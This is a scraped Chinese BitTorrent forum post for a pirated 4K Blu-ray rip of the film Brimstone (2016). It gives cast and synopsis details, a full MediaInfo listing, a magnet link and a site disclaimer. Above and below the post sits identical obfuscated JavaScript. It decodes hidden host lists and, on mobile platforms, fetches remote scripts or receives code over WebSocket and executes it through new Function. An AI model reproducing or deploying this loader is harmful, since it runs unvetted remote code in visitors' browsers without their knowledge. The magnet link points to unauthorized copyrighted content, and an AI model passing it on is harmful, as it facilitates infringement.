悍女[简繁字幕].Brimstone.2016.UHD.BluRay.2160p.DTS-HD.MA5.1.x265.10bit.HDR 21.34GB

版主小s 26天前 413

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 悍女 / 走过炼狱的女人(台) / 石女 / 炼狱之苦 / Koolhoven's Brimstone

◎片 名 Brimstone

◎年 代 2016

◎产 地 荷兰 / 法国 / 德国 / 比利时 / 瑞典 / 英国

◎类 别 悬疑 / 惊悚 / 西部

◎语 言 英语 / 荷兰语

◎上映日期 2016-09-03(威尼斯电影节) / 2017-01-12(荷兰)

◎IMDb链接 https://www.imdb.com/title/tt1895315/

◎豆瓣评分 6.8/10 (3153人评价)

◎豆瓣链接 https://movie.douban.com/subject/6874166/

◎片 长 148分钟

◎导 演 马丁·寇霍文 Martin Koolhoven (id:1048367)

◎编 剧 马丁·寇霍文 Martin Koolhoven (id:1048367)

◎演 员 达科塔·范宁 Dakota Fanning (id:1013785)

盖·皮尔斯 Guy Pearce (id:1035672)

基特·哈灵顿 Kit Harington (id:1314989)

卡里斯·范·侯登 Carice van Houten (id:1049588)

保罗·安德森 Paul Anderson (id:1317404)

艾米莉亚·琼斯 Emilia Jones (id:1318340)

艾薇·乔治 Ivy George (id:1352855)

薇拉·维塔利 Vera Vitali (id:1344285)

威廉·休斯顿 William Houston (id:1100629)

卡拉·朱里 Carla Juri (id:1337333)

杰克·罗思 Jack Roth (id:1337581)

娜奥米·巴特里克 Naomi Battrick (id:1349950)

艾德里安·斯帕克斯 Adrian Sparks (id:1370685)

多里斯·洛夫 Dorian Lough (id:1349695)

杰克·霍林顿 Jack Hollington (id:1337301)

Alexandra Guelff Alexandra Guelff (id:1438804)

比尔·坦拉蒂 Bill Tangradi (id:1362113)

泰格·格南德特 Tygo Gernandt (id:1092058)

琼基·XL Junkie XL (id:1037776)

◎标 签 西部 / 犯罪 / 惊悚 / 悬疑 / 荷兰 / 宗教 / 剧情 / 女性

◎简 介

故事发生在十七世纪的美国西部小镇中,哑女丽姿(达科塔·范宁 Dakota Fanning 饰)和丈夫伊莱(威廉·休斯顿 William Houston 饰)带着他们的孩子们生活在那里。虽然日子清贫,而丽姿又天生患有残疾,可是两人都对目前稳定的生活心满意足。

一天,镇上来了一位神父(盖·皮尔斯 Guy Pearce 饰),在见到神父第一面时,丽姿就知道,她的幸福生活将一去不复返,神父和丽姿到底有着怎样的过节以至于他要如此无情的迫害她和她的家人呢?丽姿是一名助产士,在一次手术中,孕妇出现了生命危险,在母亲和孩子只能保一个的情况下,丽姿选择了保护母亲,殊不知,这选择亦将她推向了万劫不复的深渊。

◎获奖情况 (共2项)

第73届威尼斯电影节 (2016)

主竞赛单元 金狮奖 (提名)

└──马丁·寇霍文 (id:1048367)

第30届欧洲电影奖 (2017)

最佳服装设计

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 145630752730911279148373335966624547818 (0x6D8F7676D651B32488834FAD4DB883EA)

  4. Complete name : Br[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 21.3 GiB

  8. Duration : 2 h 28 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 20.6 Mb/s

  11. Encoded date : UTC 2021-11-05 03:06:59

  12. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  13. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. HDR format : SMPTE ST 2086, HDR10 compatible

  20. Codec ID : V_MPEGH/ISO/HEVC

  21. Duration : 2 h 28 min

  22. Bit rate : 17.5 Mb/s

  23. Width : 3 840 pixels

  24. Height : 1 600 pixels

  25. Display aspect ratio : 2.40:1

  26. Frame rate mode : Constant

  27. Frame rate : 23.976 (24000/1001/53354) FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0 (Type 2)

  30. Bit depth : 10 bits

  31. Bits/(Pixel*Frame) : 0.119

  32. Stream size : 18.2 GiB (85%)

  33. Title : HEVC, [email protected]@High, 24/1.001 fps @ 17516 kbps

  34. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  35. Encoding settings : cpuid=533541111039 / frame-threads=4 / numa-pools=20 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=3840x1600 / interlace=0 / total-frames=213649 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=4 / no-allow-non-conformance / repeat-headers / annexb / no-aud / hrd / info / hash=0 / no-temporal-layers / no-open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=8 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=25 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=64 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=20.5 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=160000 / vbv-bufsize=160000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.30 / pbratio=1.20 / aq-mode=3 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=9 / transfer=16 / colormatrix=9 / chromaloc=1 / chromaloc-top=2 / chromaloc-bottom=2 / display-window=0 / master-display=G(13250,34500)B(7500,3000)R(34000,16000)WP(15635,16450)L(10000000,10) / cll=1000,400 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / hdr10 / hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  36. Language : English

  37. Default : Yes

  38. Forced : No

  39. Color range : Limited

  40. Color primaries : BT.2020

  41. Transfer characteristics : PQ

  42. Matrix coefficients : BT.2020 non-constant

  43. Mastering display color primaries : Display P3

  44. Mastering display luminance : min: 0.0010 cd/m2, max: 1000 cd/m2

  45. Maximum Content Light Level : 1000 cd/m2

  46. Maximum Frame-Average Light Level : 400 cd/m2


  47. Audio

  48. ID : 2

  49. Format : DTS XLL

  50. Format/Info : Digital Theater Systems

  51. Commercial name : DTS-HD Master Audio

  52. Codec ID : A_DTS

  53. Duration : 2 h 28 min

  54. Bit rate mode : Variable

  55. Bit rate : 3 004 kb/s

  56. Channel(s) : 6 channels

  57. Channel layout : C L R Ls Rs LFE

  58. Sampling rate : 48.0 kHz

  59. Frame rate : 93.750 FPS (512 SPF)

  60. Bit depth : 24 bits

  61. Compression mode : Lossless

  62. Stream size : 3.12 GiB (15%)

  63. Title : English DTS-HD Master Audio 5.1 @ 3004 kbps

  64. Language : English

  65. Default : Yes

  66. Forced : No


  67. Text #1

  68. ID : 3

  69. Format : PGS

  70. Codec ID : S_HDMV/PGS

  71. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  72. Duration : 2 h 0 min

  73. Bit rate : 520 b/s

  74. Count of elements : 60

  75. Stream size : 459 KiB (0%)

  76. Title : Eng/SUP

  77. Language : English

  78. Default : No

  79. Forced : No


  80. Text #2

  81. ID : 4

  82. Format : PGS

  83. Codec ID : S_HDMV/PGS

  84. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  85. Duration : 2 h 21 min

  86. Bit rate : 22.2 kb/s

  87. Count of elements : 1703

  88. Stream size : 22.4 MiB (0%)

  89. Title : Chs/SUP 简英双语

  90. Language : Chinese

  91. Default : Yes

  92. Forced : No


  93. Text #3

  94. ID : 5

  95. Format : PGS

  96. Codec ID : S_HDMV/PGS

  97. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  98. Duration : 2 h 21 min

  99. Bit rate : 22.8 kb/s

  100. Count of elements : 1703

  101. Stream size : 23.0 MiB (0%)

  102. Title : Cht/SUP 繁英双语

  103. Language : Chinese

  104. Default : No

  105. Forced : No


  106. Menu

  107. 00:00:00.000 : en:第 01 章

  108. 00:02:01.121 : en:第 02 章

  109. 00:12:08.436 : en:第 03 章

  110. 00:24:12.868 : en:第 04 章

  111. 00:32:38.623 : en:第 05 章

  112. 00:42:40.475 : en:第 06 章

  113. 00:56:03.610 : en:第 07 章

  114. 01:09:09.103 : en:第 08 章

  115. 01:17:12.086 : en:第 09 章

  116. 01:24:54.256 : en:第 10 章

  117. 01:37:53.993 : en:第 11 章

  118. 01:50:46.723 : en:第 12 章

  119. 01:56:09.588 : en:第 13 章

  120. 02:03:23.605 : en:第 14 章

  121. 02:14:08.958 : en:第 15 章

  122. 02:20:12.279 : en:第 16 章


TAGS 惊悚 悬疑 西部

磁力链:
  • magnet:?xt=urn:btih:FCA28B2B7687377DB8F246924C0C10C5B3BA63A9

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};